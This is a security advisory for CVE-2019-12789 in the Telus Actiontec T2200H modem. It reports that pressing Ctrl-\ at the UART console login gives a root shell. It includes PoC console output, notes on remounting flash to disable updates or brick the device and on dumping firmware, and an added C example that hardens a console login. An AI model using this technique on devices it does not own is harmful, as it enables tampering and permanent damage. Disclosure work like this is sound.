### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: T2200H
Affected Firmware: T2200H-31.128L.08
Device Manual:
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf
Reported: Sept 2018
CVE: CVE-2019-12789
The Telus Actiontec T2200H is a bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11bgn wireless, etc.
### Summary of Findings
By attaching an adapter, such as a Raspberry Pi or other UART adapter,
to the UART pins on the system board, an attacker can use a special
key sequence (Ctrl-\) to obtain a shell with root privileges at the
login prompt.
After gaining root access, the attacker can mount the Linux /dev/md*
jffs2 partitions read-write and make permanent modifications to the
device including disabling features such as remote management, vendor
updating, etc. It can also be used to overwrite the flash storage,
permanently bricking the device.
Other note: I was also able to cross-compile a new full-functionality
BusyBox binary using https://buildroot.org/. By plugging in a USB Mass
Storage Device on the rear of the modem, I was able to dump the firmware
using “busybox dd”.
### PoC (UART output)
Login:
Password: (Ctrl+\)
….
(Long stack trace)
….
#
# cat /etc/image_version
T2200H-311288BGW1521450
# ps aux
PID USER VSZ STAT COMMAND
233 admin 1980 R -/bin/sh
251 admin 0 DW< [kthread]
269 admin 0 SW [kpAliveWatchdog]
301 admin 0 SW [bcmsw]
302 admin 0 SW [bcmsw_timer]
355 500 2344 S /bin/dbus-daemon --system
372 admin 1976 S syslogd -n -C -l 5
373 admin 1952 S klogd -n
911 admin 1732 S /bin/wlevt
1041 admin 0 SW [dsl0]
1273 admin 7084 S swmdk
1401 admin 1800 S ./pmd
1451 admin 5304 S smbd -D
1540 admin 7084 S swmdk
1541 admin 7084 S swmdk
1544 admin 7084 S swmdk
1569 admin 5304 S smbd -D
1661 admin 1304 S /bin/lld2d br0
1785 admin 1240 S /bin/eapd
1803 admin 1676 S /bin/nas
2129 admin 1344 S /bin/acsd
2175 admin 3132 R /bin/wps_monitor
2262 admin 3916 S ./data_center
5941 admin 2924 S dhcp6s -c /var/dhcp6s.conf br0
6018 admin 896 S radvd -C /var/radvd.conf
# mount
rootfs on / type rootfs (rw)
mtd:rootfs on / type jffs2 (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (rw,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)
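
On a Linux tty, Ctrl-\ is the default QUIT character and makes the line discipline send SIGQUIT to the foreground process. The following is an added hardening example, not code from the advisory or the vendor firmware: it shows how a console login program can stop that key from generating a signal before it prints its prompt. The advisory does not state the root cause, so treating the QUIT key as the trigger is an assumption, and the function names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

/* Clear the tty settings that turn Ctrl-\, Ctrl-C and Ctrl-Z into signals. */
void harden_termios(struct termios *t)
{
    t->c_lflag &= ~(tcflag_t)ISIG;      /* no key-generated signals at all */
    t->c_cc[VQUIT] = _POSIX_VDISABLE;   /* Ctrl-\ (0x1c), the key in the PoC */
    t->c_cc[VINTR] = _POSIX_VDISABLE;   /* Ctrl-C */
    t->c_cc[VSUSP] = _POSIX_VDISABLE;   /* Ctrl-Z */
}

/* Also ignore the signals, in case they are delivered some other way. */
int ignore_console_signals(void)
{
    static const int sigs[] = { SIGQUIT, SIGINT, SIGTSTP };
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = SIG_IGN;
    for (size_t i = 0; i < sizeof sigs / sizeof sigs[0]; i++)
        if (sigaction(sigs[i], &sa, NULL) != 0)
            return -1;
    return 0;
}

/* Call on the console fd before printing "Login:". 0 = tty hardened,
 * 1 = fd is not a tty (signals ignored only), -1 = error. */
int harden_console(int fd)
{
    struct termios t;
    if (ignore_console_signals() != 0)
        return -1;
    if (!isatty(fd))
        return 1;
    if (tcgetattr(fd, &t) != 0)
        return -1;
    harden_termios(&t);
    return tcsetattr(fd, TCSANOW, &t) == 0 ? 0 : -1;
}

int main(void)
{
    int rc = harden_console(STDIN_FILENO);
    printf("console hardening: %s\n",
           rc == 0 ? "tty + signals" : rc == 1 ? "signals only" : "failed");
    return rc < 0;
}
```

This covers only the keyboard-signal path. A login program should also fail closed, so that a crash at the prompt returns to the prompt and never leaves a shell on the console.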